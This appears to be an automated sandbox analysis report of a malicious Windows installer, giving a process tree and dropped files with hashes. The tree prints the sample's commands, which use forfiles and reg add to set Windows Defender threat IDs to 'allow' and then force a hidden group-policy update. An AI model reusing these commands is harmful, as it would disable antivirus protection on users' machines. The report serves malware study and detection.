                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:campaign-ignore-dna=on --with-feature:campaigns-2024=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:in-house-autocomplete-send=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-2:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3804,i,11172983169099984968,12219371288895693040,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:1
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:6356
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS8090.tmp\Install.exe Wt /iyIdidkKWA 385118 /S
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:6468
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3920
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:948
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:5912
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:5836
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:6544
                                                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:6576
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:1712
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:4316
                                                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:6580
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:6056
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:4216
                                                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:6704
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1608
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:6188
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:5524

                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\1000017002\2c03579092.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2.3MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                2835e1a3616d770ff8488b461bcbb674

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                8c626204ac9f7ab8b619d74592048663db088860

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                b6e6b0a43620f9839eceb8254ebefa0888265a1d7c645fec876507227f2638f9

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                b8afb8cd19be5d944aa32f072a3ee10fa8e6562693e7e0e07da4c7ef3ddcc4a805e4f0c7a897cc196bc25d827bc0ba648abb995e3fd464dd1ca816131f26393d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                336B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                d54ed6d006f5dcdb8ea1a4a12ed2c0f9

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                8c8433a6034cbb3b478dc08b8cc31b7b2b71db7c

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                980b501a74a3af73f343419be05e06f3b7e355ab070718520b403b71fa816d46

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                4174f227ae744e9595acffb41028f211e375038dd23a486bf1061f498ece7d590938eebb40b46652c42686b496df84c1a4550d183904e37b90df43fdc8f1515d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                152KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                3d3b41635b6178bb1e269f2cfa723a12

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                bf072da1eafeabeaec752b38e884fc6067e5fe8d

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                8691a1dd0c4e7a51f8e600da254074e76ac24c2d41491b5ca21b86db00bc9fa2

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                3a92ea4307f7f5a594bff8fbc65f1cbd5018a380fe068a3a240ac0f8ea35aa55d610162e20a7ff9f48799e04ac06d0c5b249013f75e2d60dfef983de8344fa9c

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                20KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                331e787665549043b7b541eb04a38a4a

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                930748c413f3479646aad587a206844dd55069a3

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                719d6a033c6bca9b6a41dd8b6b8acb55a2563f4f24398f67439e60d189cfc2c0

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                14713727ca6292d746f9ddaa4928f0760b9fb7a069b4332ee0102e141cde57344cc96edc3b63cd395408bb03cb4b175c8b2daaa3acca6c306a229d0095b11224

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                524B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                78cb6d5c1ba7815a2eb23be11f092b49

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                37eabe3b4f0a6c44628ad027cfb21f682ca05efe

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                ac8dd62862fe583cfcfcbc5a43277128e95278e749d89ab29ea80d19711421e8

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                5617b0544a9a751f927f53995efcd2ca645d8a2d97660af9d5cfbb89cc2b90d82a2e58feda3b65cac0f5e0ef1541bf63ab53de15fa174c551621820597763881

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                7KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b7f29f7ead73b1f8436aa23859fda236

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                0d98db57ce926fc714929c9d714c8b31c0e607f7

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                4fb438558b7a9cd572a0ca1e6b509d9cd06f6f04ced3784689460de3ca5f1857

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                946c1e191a850dc6506d9186df8d0cf42e48e17394bca63ae698e73f0eb87744ceb64ce9a3fdd38366b800b054e5b0dba2d3adb8583af7b81f73d01ec522670f

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                16KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                18f374661b647bfd12c15a94154317d7

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                d626ff1eb5479bda74412101c523461d14832f55

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                07a0f6fbe1fdd00b1db836fee6716ebfc3019b54b4c9876e5615acd374d071ba

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                d035407f3da7e1e9914dea3866d0d418c84939daff73b16cfcb319232e1db5614412eaab732f9635d1cce341534143ddb3c4a3d5484371bfe30357b61e07475e

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                257KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                0e0f4d709494b8b24127fbbc81e9ffcc

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                56b09a9932c9cae1c7d0f54dfcdae840e372bc11

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                1805779091c0ad3039ea29d246448df0a0bb464efbd0e533403cb2765b360a82

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                65338d0a720e0a337ad192c3ca63a3954287f6dbb2497eaad6ee738f5e2ca3b868e2cf280c7a3f65130e8e0e5e0f1f0cbeabaef202aab1f36fdd559f64811d74

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                ae626d9a72417b14570daa8fcd5d34a4

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                c103ebaf4d760df722d620df87e6f07c0486439f

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                52cc3f3028fab0d347a4a3fffef570b42f85748176d81a3344996d42fd1de32a

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                a0690bda318bdf43d6f292f88d4ea2ebeec83b95e9ebca80083dbb08e7ddcdb9735cc58b89d369a34f10acf8a114d4a207ed8d0f070c5baf87c5798e9f35bc14

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b3a83d0196afc480a90a1e7444210036

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                6376ef283df20976769287b3bdc6bcd5d5ce371f

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                3ac4190b1c447f3b5365b056150575ec779ffba10b82d940c93009e2f6809a07

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                dfff8f23370ae8ab390b8a3dd675dd71ca6a8d0fac0f0c9a8b43453763ba5fa96a79a4b5a8891bcac86996471b912ca51dfc6b877d647391d14e355191d77370

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                976bc8e5fe65f9bb56831e20f1747150

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                f9e7f5628aaaabed9939ef055540e24590a9ccfb

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.5MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                07247f47523dd013951bdffc00ea56db

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                6ebad62645a4fd0e838441c7bce2b02a8ce090cc

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                e7f8037ab38406ef5e4165dd1a4da69b819e20e69d3a971e132cc2612c236fe8

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                d36811ab04c966cf719dc96c1dc36c25f3ba29093f235c5a7e076a452a0f33180efe597bec059ca1a0065a6cad954b23ee0323c2f79b737a82b780533ff82c37

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\9ae1869f-b06f-485d-9589-a33012995534.tmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                4a43d4521012fe56fee8d12fb88064dc

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                7d63bbc3b208ef236fd3141e5cae45dd3cc1b858

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                b5d5e6fa2902b930d1c84a53a749bb0293204650cb4caad4660b74348b8e417c

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                1fd02a180805915062402becc3c5e5f47b32a0bfcc9be47a9ad3a48bb5ed5aad706521138fb1ae110bfb373497ff346a2160fb6edba8ec455b1acc28b40e7411

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\Opera Browser.lnk

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                05b98a6f8537e646e7822ac4c061d00c

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                542654057a041b544e5900841db5f6ce92abc850

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                e1798d7911eba3ca975f057b3520a95c463a5030310a477f6134fd6173e6918a

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                6bf8039a2b2c7f6aacecb91cc4658bcc606c323b68bef3aaf89424984efe3a67cb5dd9f52d1aef5640666e6a86e4b6fea90e4ee68c9e3dee399d431abc1e4901

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\additional_file0.tmp

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2.5MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                15d8c8f36cef095a67d156969ecdb896

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                a1435deb5866cd341c09e56b65cdda33620fcc95

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\installer_prefs_include.json

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                232B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                69228788bc5d569b3979fec5828c57cd

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                8b908eb8adab0bc75004300202fc61f6d773440c

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                2c0edf69da61ff6f1d5095455bbfc611e688b17c758629397d9d27a78d1b7e18

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                8c44bd74f8080cc89369f89042d23361d5ef54de94b2a1f594864efe759e4327126529ae66d797ce1ce3709a0f134eb22d05cfbffa4d8ac19ea53f13486680a8

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\installer_prefs_include.json.backup

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                217B

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                0877f3d72379da38ceac5792bc9fdd4f

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                19423305bbc320d576f1337a750313818347beac

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                cb56400eb931eaa859366e9e6605082fad1e82fe749210b817cebce9b34537db

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                8b874f11e8d0c73578e01d2b9e2a971c51b68dadd33bfa6218d7096ff2219bb6ca37e16ade02b985a5a388238b96644f4906523ac93feb84f206d623e67719b2

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404282323261\opera_package

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                103.9MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b7e7c07657383452919ee39c5b975ae8

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                2a6463ac1eb8be1825b123b12f75c86b7fff6591

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.8MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                91201b7784e39d41aae210c33c29bc9e

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                f4b7793c5cfc1ab59e68a01ba802f531c995039b

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                6d3ce517ac5dd53e1eadd09f12c7516147265bf4abb692cc494065fb95c62565

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                37664019bb5cfe96f416aae1153a7cadc2bae9b0fdfccedd2f885c22fa2cb1255afff972c0fb13f2009f742a7be47aecae710558fc7038fdaa17e50ecf4ecab2

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b9c497bafef0a37f12fb2a75b305b3a9

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                a1d1be529e01aadd886f4e77d34b027832778a30

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                86867f27608b71b4a2368d885cd11b4da5dd1dfa092366095db5fd6edac8b692

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                6c804ea3650121e4a188b569d9ba1257a764a320e3c552af26c9c83981585649b90b551732541e12d6d1683f303b8d2c02c167fbd38ef489620a63caac240b3d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                321KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                1c7d0f34bb1d85b5d2c01367cc8f62ef

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                33aedadb5361f1646cffd68791d72ba5f1424114

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                2.7MB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                460KB

                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b22521fb370921bb5d69bf8deecce59e

